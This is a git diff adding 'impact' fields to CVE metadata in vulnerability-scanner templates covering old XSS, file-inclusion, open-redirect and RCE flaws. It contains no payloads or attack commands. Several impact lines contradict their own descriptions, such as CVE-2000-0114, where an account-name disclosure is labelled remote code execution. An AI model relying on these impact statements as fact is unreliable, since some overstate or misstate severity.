diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index eb403449b2..084ee01d5d 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -5,6 +5,8 @@ info: author: r3naissance severity: medium description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. + impact: | + High: Remote code execution or denial of service. remediation: Upgrade to the latest version. reference: - https://nvd.nist.gov/vuln/detail/CVE-2000-0114 diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index e4375cb977..e1fc7d5360 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access to the affected device. remediation: | Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software. reference: diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 6af54c6cd2..01b02ba2aa 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: The Virtual Keyboard plugin for SquirrelMail 1.2.6/1.2.7 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Upgrade to a patched version of SquirrelMail or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index cefb1e2ae3..179d4f0b54 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface. remediation: Upgrade to the latest version. reference: - https://www.exploit-db.com/exploits/24068 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index c14de273e0..186f5c9a6b 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php. + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft. remediation: | Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities. reference: diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 9a8d90ed9a..e5b51c59c8 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -5,6 +5,8 @@ info: author: CasperGN severity: medium description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696). + impact: | + The vulnerability can lead to the disclosure of sensitive information, potentially compromising user privacy and system security. remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files. reference: - http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index a023ce2b97..a4f726bdd6 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access. + impact: | + An attacker can gain unauthorized access to sensitive administrative functions and potentially compromise the entire system. remediation: | Apply the latest security patches or upgrade to a patched version of Horde Groupware to fix the vulnerability. reference: diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 95cf0166c9..b90055e566 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability. reference: diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 1523932118..8f7380efc8 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 44fd20a1ff..8407d9ff4d 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 65247aade2..3fa16308e7 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability. reference: diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index c7015b0ac2..ead18d7075 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 8b1892de00..75612bc84b 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. + impact: | + Remote code execution remediation: | Update to the latest version of Apache Struts2 reference: diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 2765d841da..9948e70a33 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 046b971242..e310a05925 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation. remediation: | Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 98b0b24f00..a9c0d135f7 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index 84e9b66b44..b50e618eac 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. + impact: | + An attacker can exploit this vulnerability to trick users into visiting malicious websites, leading to potential phishing attacks. remediation: | Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server. reference: diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index 49edb2bcba..8bdd43a6e1 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -5,6 +5,8 @@ info: author: unstabl3 severity: medium description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 2bcda26401..fadc7332f0 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 399ae2e350..2769d59b0c 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index dec0852cf6..ef3566fe72 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml 
@@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server and potentially execute arbitrary code. remediation: | Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index e14247ebdd..84180dd68e 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index f85d8602a3..4c00b5ba6f 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Update Joomla! Component RWCards to the latest version to mitigate the vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 4ad5b672ef..fbdc737eb6 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 76b25c9fbc..2b81d63556 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 7d28c73842..8248fdcbe2 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 6fe61a9a36..894eb7cf8b 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index 077a9bc327..3dc5f17842 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter. + impact: | + An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks. remediation: | Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 7931daeab2..6bb7021b22 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of ZeroShell. reference: 
diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 59c6109bdc..57f8062f33 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware. reference: diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 19cf80ee3b..74bb0290d5 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: high description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system. remediation: | Update PhpMyAdmin to the latest version or apply the necessary patches. reference: diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index 8c7e3ecedd..6542361d15 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 621d69493b..b19eeb78ac 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the device, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 4ccde8be73..681b806249 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml 
@@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 7da1d0d2c5..0eeeb78f75 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion). + impact: | + The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure. remediation: | Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor. reference: diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index efd4822da4..c8b97dc4ed 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation. remediation: | Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 77f8c9c527..f20685ba40 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index e458678e4b..2fe05e7751 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml 
@@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. + impact: | + The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, data disclosure. remediation: | Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates. reference: diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index a056354cce..0e3593637c 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 1d7023e9a8..68626cde37 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: high description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter. + impact: | + An attacker can exploit this vulnerability to include arbitrary files from remote servers, leading to remote code execution or information disclosure. remediation: | Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 9d47d0e5cd..4a34ae81cf 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability. reference: diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 136b2f76e8..cd502f0720 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. + impact: | + Allows attackers to redirect users to malicious websites or phishing pages. remediation: Apply all relevant security patches and product upgrades. reference: - https://nvd.nist.gov/vuln/detail/CVE-2009-5020 diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 468484b262..02a49c64fb 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. + impact: | + An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/36994 diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 4387e6bef7..3890bb785b 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. + 